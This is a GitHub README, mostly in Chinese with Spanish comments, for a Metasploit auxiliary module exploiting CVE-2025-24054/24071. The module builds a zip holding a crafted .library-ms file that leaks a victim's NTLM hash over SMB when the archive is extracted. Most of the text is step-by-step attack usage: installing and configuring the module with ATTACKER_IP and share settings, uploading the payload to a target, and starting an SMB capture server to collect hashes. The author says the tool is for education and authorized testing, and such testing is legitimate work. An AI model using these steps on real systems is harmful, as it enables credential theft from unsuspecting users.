SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module
GitHub: SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module
这是一个针对 CVE-2025-24054 漏洞的 Metasploit 辅助模块,通过生成特制的 .library-ms 文件在 Windows 解压过程中自动触发 NTLM 哈希泄露。
Stars: 0 | Forks: 0
# CVE-2025-24054/24071 - Metasploit 模块
## 概述
该漏洞发生在 `.zip` 文件的解压过程中。当与特制的 `.library-ms` 文件交互时,Windows 资源管理器会处理内部 XML 架构,并自动向攻击者控制的远程路径发起 SMB 认证请求。
此行为允许泄露用户的 NTLM 哈希,且除了解压文件外,无需任何额外的交互。要查看概念验证,我建议访问以下链接:[Fluffy - HTB](https://securitylayer.gitbook.io/securitylayer/maquinas-y-modulos-de-htb/windows-easy/fluffy)。
## ⚠️ 关键说明:
虽然该漏洞最初被披露为 CVE-2025-24071,但目前官方追踪编号为 CVE-2025-24054。
## 📌 安装
克隆仓库:
```
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
```
将模块复制到 Metasploit 目录:
```
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
```
如果目录不存在,请使用以下命令创建:
```
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
```
然后再次复制模块。
## 📌 使用
启动 Metasploit 并加载模块:
```
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
```
如果模块加载成功,你将看到配置选项:
```
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
```
配置模块并运行:
```
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
```
输出:该模块会生成一个 `.zip` 文件,该文件需要上传到目标 SMB 服务器,以便受害者随后执行。
```
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
```
最后,使用 Metasploit 的 SMB 捕获模块来接收 NTLM 哈希:
```
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
```
**如果你在从 Metasploit 启动 SMB 服务器时遇到问题:**
- 以 root 身份运行 msfconsole
- 确保 ntlm_hash_leak.rb 文件具有适当的权限供 root 访问
## ⚠️ 警告
此模块仅出于教育目的和授权测试而开发。
未经授权使用此类工具可能是非法的。
## 🕷 作者
Security Layer
标签:CVE-2025-24054, CVE-2025-24071, Impacket, Metasploit 模块, NTLM 哈希泄露, Responder, Ruby, SMB 认证, Windows 漏洞, Zip 文件解压, 中间人攻击, 文件格式漏洞, 知识库, 网络安全, 资源劫持, 辅助模块, 防御绕过, 隐私保护